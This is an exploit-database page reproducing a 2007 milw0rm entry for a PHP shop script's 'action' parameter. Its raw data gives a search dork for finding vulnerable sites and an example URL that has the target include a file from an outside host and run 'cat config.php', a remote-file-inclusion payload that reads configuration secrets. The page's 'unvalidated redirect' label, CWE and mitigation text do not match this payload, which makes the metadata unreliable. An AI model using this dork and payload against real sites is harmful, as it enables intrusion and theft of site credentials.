header-logo
Suggest Exploit
vendor:
Not mentioned
by:
mozi2weed@yahoo.com
5.5
CVSS
MEDIUM
Unvalidated Redirect and Forward
601
CWE
Product Name: Not mentioned
Affected Version From: Not mentioned
Affected Version To: Not mentioned
Patch Exists: Not mentioned
Related CWE: Not provided
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
2007

Unvalidated Redirect and Forward

The vulnerability allows an attacker to redirect users to malicious websites or forward them to another page without proper validation.

Mitigation:

Developers should always validate and sanitize user input before using it in redirect or forward actions. Use whitelisting to allow only trusted URLs.
Source

Exploit-DB raw data:

ork:allinurl:index.php?action= basket sid
vuln:index.php?action=
examples:
http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php

author:mozi2weed@yahoo.com
site:http://mozi.rootmybox.org
support:http://darkc0de.com & whoami

# milw0rm.com [2007-10-28]

Navigation

Suggest Exploit

Services By CQR